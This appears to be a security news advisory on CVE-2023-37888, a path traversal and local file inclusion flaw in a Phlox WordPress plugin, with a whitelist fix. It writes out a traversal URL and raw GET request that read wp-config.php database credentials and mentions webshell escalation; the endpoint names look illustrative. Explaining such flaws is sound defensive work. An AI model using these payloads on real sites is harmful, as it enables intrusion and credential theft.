CVE CyberSecurity Database News

CVE-2023-37888 - Path Traversal Vulnerability in Phlox “Shortcodes and Extra Features” Plugin Lets Attackers Include Local Files

Poster -

Short Summary:
CVE-2023-37888 exposes WordPress sites using the popular Phlox theme’s plugin, Shortcodes and Extra Features, to a dangerous Path Traversal flaw. This bug lets an attacker read sensitive files or execute unintended PHP scripts on the server using a simple trick in the URL—no authentication needed, up to version 2.14..

What Is The Vulnerability?

Path Traversal bugs (in security-speak: Improper Limitation of a Pathname to a Restricted Directory) let hackers access files outside of intended folders by sneaking ".." (dot-dot) patterns into directory paths. In this case, the Shortcodes and Extra Features for Phlox theme fails to properly check user input, which makes this attack possible.

Specifically, a vulnerable part of the code allows visitors to specify files that the server will load and run as PHP, without checking if these files should be allowed. That’s called Local File Inclusion (LFI).

Is My Site At Risk?

If you run the plugin Shortcodes and extra features for Phlox theme (any version before or including 2.14.), you are at risk.

Version Affected: unknown initial version through 2.14.

- CVE: CVE-2023-37888 (MITRE)
- Official advisory from Phlox/AvVertra

Under The Hood: The Code

Let’s peek at what goes wrong.
In the plugin’s code (before they fixed it), there is a handler for calling widgets or templates that trusted user input on what file should be loaded:

// vulnerable pattern (simplified)
$file = $_GET['file'] ?? '';
include($file); // no sanitization!

If an attacker calls yoursite.com/?file=../../../../wp-config.php, the PHP engine tries to include the wp-config.php file, which stores your DB password and credentials.

Visit the vulnerable URL and supply a path to a sensitive file—for example

https://victimsite.com/wp-content/plugins/shortcodes-and-extra-features-for-phlox/some-endpoint.php?file=../../../../wp-config.php

2. The plugin will include wp-config.php, showing its contents or causing a PHP error that leaks sensitive information.

More dangerous:
Attackers can include /proc/self/environ or upload a malicious payload somewhere and trigger a webshell, leading to full site takeover.

Request

GET /wp-content/plugins/shortcodes-and-extra-features-for-phlox/vulnerable.php?file=../../../../wp-config.php HTTP/1.1
Host: victimsite.com

If vulnerable, you might see content like

<?php
define('DB_NAME', 'db_name_here');
define('DB_USER', 'db_user_here');
define('DB_PASSWORD', 'supersecretpass');
...
?>

*An attacker could grab your database secrets like this!*

How To Fix It

Solution:
The plugin must validate and sanitize the filename before including it.

Fixed code looks like

$file = $_GET['file'] ?? '';
$allowed = ['template1.php','template2.php'];
if (in_array($file, $allowed)) {
    include($file);
} else {
    die('Invalid file');
}

Official References

- NVD Entry for CVE-2023-37888
- WordPress Plugin: Shortcodes and extra features for Phlox theme
- Patch commit on plugin SVN

In Short

CVE-2023-37888 is a big risk for WordPress sites running the Phlox plugin.
Don’t wait: patch your plugins, check your logs, and take this as a reminder to never trust user input—especially on file paths!

Need more info?
Read the official WordPress plugin advisory and CVE entry.

Timeline

Published on: 05/17/2024 07:15:57 UTC
Last modified on: 05/17/2024 18:36:05 UTC